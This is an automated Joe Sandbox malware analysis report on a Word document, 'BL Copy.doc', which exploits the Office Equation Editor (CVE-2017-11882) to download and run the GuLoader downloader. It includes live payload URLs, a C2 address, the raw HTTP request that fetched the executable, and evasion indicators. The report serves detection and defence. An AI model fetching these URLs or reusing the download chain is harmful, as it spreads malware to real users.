Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BL Copy.doc

Overview

General Information

Sample Name:BL Copy.doc
Analysis ID:558760
MD5:2fea7c43cd327113333de7ff54800979
SHA1:b2cf7c97bbfec5b765ee9402f57440910ec89e8b
SHA256:6ed3aca39d91726d1f16ecb2fa8fc5cc38fa4cce1355bfd5186d2a22769e806c
Tags:doc
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Document contains Microsoft Equation 3.0 OLE entries
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2420 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2684 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • Puportd92.exe (PID: 2960 cmdline: C:\Users\user\AppData\Roaming\Puportd92.exe MD5: 37FC2AA213D1607545A9B876F4AA543E)
  • cleanup
{"Payload URL": "https://bangladeshshoecity.com/im"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.745732792.0000000003790000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 131.153.37.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2684, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2684, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SYNT[1].exe

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\Puportd92.exe, CommandLine: C:\Users\user\AppData\Roaming\Puportd92.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Puportd92.exe, NewProcessName: C:\Users\user\AppData\Roaming\Puportd92.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Puportd92.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2684, ProcessCommandLine: C:\Users\user\AppData\Roaming\Puportd92.exe, ProcessId: 2960

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000004.00000002.745732792.0000000003790000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://bangladeshshoecity.com/im"}
    Source: BL Copy.docVirustotal: Detection: 27%Perma Link
    Source: BL Copy.docReversingLabs: Detection: 20%
    Source: http://margos.org/dda/SYNT.exeAvira URL Cloud: Label: malware
    Source: margos.orgVirustotal: Detection: 7%Perma Link
    Source: http://margos.org/dda/SYNT.exeVirustotal: Detection: 11%Perma Link
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0A92385B-F20B-4105-B494-8D633B606BC4}.tmpAvira: detection malicious, Label: EXP/CVE-2018-0798.Gen

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\Puportd92.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\Puportd92.exe
    Source: ~WRF{0A92385B-F20B-4105-B494-8D633B606BC4}.tmp.0.drStream path '_1704534972/\x1CompObj' : ...........................F....Microsoft Equation
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_00406873 FindFirstFileW,FindClose,
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0040290B FindFirstFileW,
    Source: global trafficDNS query: name: margos.org
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 131.153.37.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 131.153.37.3:80

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://bangladeshshoecity.com/im
    Source: Joe Sandbox ViewASN Name: SSASN2US SSASN2US
    Source: Joe Sandbox ViewIP Address: 131.153.37.3 131.153.37.3
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 24 Jan 2022 12:11:08 GMTServer: ApacheLast-Modified: Sun, 23 Jan 2022 21:05:28 GMTAccept-Ranges: bytesContent-Length: 95264Keep-Alive: timeout=5, max=200Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 55 80 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 28 0e 00 00 00 00 00 00 00 00 00 00 a0 5f 01 00 80 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 28 0e 00 00 00 c0 04 00 00 10 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /dda/SYNT.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: margos.orgConnection: Keep-Alive
    Source: Puportd92.exe.2.dr, SYNT[1].exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: Puportd92.exe.2.dr, SYNT[1].exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: Puportd92.exe.2.dr, SYNT[1].exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: Puportd92.exe.2.dr, SYNT[1].exe.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: Puportd92.exe.2.dr, SYNT[1].exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: Puportd92.exe.2.dr, SYNT[1].exe.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: Puportd92.exe, 00000004.00000002.745588168.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Puportd92.exe, 00000004.00000000.414258604.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Puportd92.exe.2.dr, SYNT[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: Puportd92.exe.2.dr, SYNT[1].exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: Puportd92.exe.2.dr, SYNT[1].exe.2.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: Puportd92.exe.2.dr, SYNT[1].exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: Puportd92.exe.2.dr, SYNT[1].exe.2.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DF251CD5-FF6C-451C-B429-835255A63BB9}.tmpJump to behavior
    Source: unknownDNS traffic detected: queries for: margos.org
    Source: global trafficHTTP traffic detected: GET /dda/SYNT.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: margos.orgConnection: Keep-Alive
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

    System Summary

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SYNT[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\Puportd92.exeJump to dropped file
    Source: ~WRF{0A92385B-F20B-4105-B494-8D633B606BC4}.tmp.0.drOLE indicator application name: unknown
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0040755C
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_00406D85
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_729A1BFF
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0379559A
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_03793D5A
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0379734F
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_03793B22
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_03796D17
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_037915FB
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_037939FE
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_037941F1
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0379719A
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0379767A
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0379744F
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_03795435
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_03790217
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_037952F8
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_03793A95
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_03795881
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0379559A NtAllocateVirtualMemory,
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_037952F8 NtAllocateVirtualMemory,
    Source: ~WRF{0A92385B-F20B-4105-B494-8D633B606BC4}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeProcess Stats: CPU usage > 98%
    Source: ~WRF{0A92385B-F20B-4105-B494-8D633B606BC4}.tmp.0.drOLE indicator has summary info: false
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeMemory allocated: 76E90000 page execute and read and write
    Source: BL Copy.docVirustotal: Detection: 27%
    Source: BL Copy.docReversingLabs: Detection: 20%
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\Puportd92.exe C:\Users\user\AppData\Roaming\Puportd92.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\Puportd92.exe C:\Users\user\AppData\Roaming\Puportd92.exe
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$L Copy.docJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE197.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.winDOC@4/13@1/1
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_004021AA CoCreateInstance,
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
    Source: ~WRF{0A92385B-F20B-4105-B494-8D633B606BC4}.tmp.0.drOLE document summary: title field not present or empty
    Source: ~WRF{0A92385B-F20B-4105-B494-8D633B606BC4}.tmp.0.drOLE document summary: author field not present or empty
    Source: ~WRF{0A92385B-F20B-4105-B494-8D633B606BC4}.tmp.0.drOLE document summary: edited time not present or 0
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: BL Copy.docStatic file information: File size 1786089 > 1048576
    Source: ~WRF{0A92385B-F20B-4105-B494-8D633B606BC4}.tmp.0.drInitial sample: OLE indicators vbamacros = False

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000004.00000002.745732792.0000000003790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_729A30C0 push eax; ret
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_03792EF0 push es; iretd
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_729A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SYNT[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeFile created: C:\Users\user\AppData\Local\Temp\nsq4443.tmp\System.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\Puportd92.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2696Thread sleep time: -300000s >= -30000s
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_037952EA rdtsc
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_00406873 FindFirstFileW,FindClose,
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0040290B FindFirstFileW,
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeAPI call chain: ExitProcess graph end node
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeAPI call chain: ExitProcess graph end node
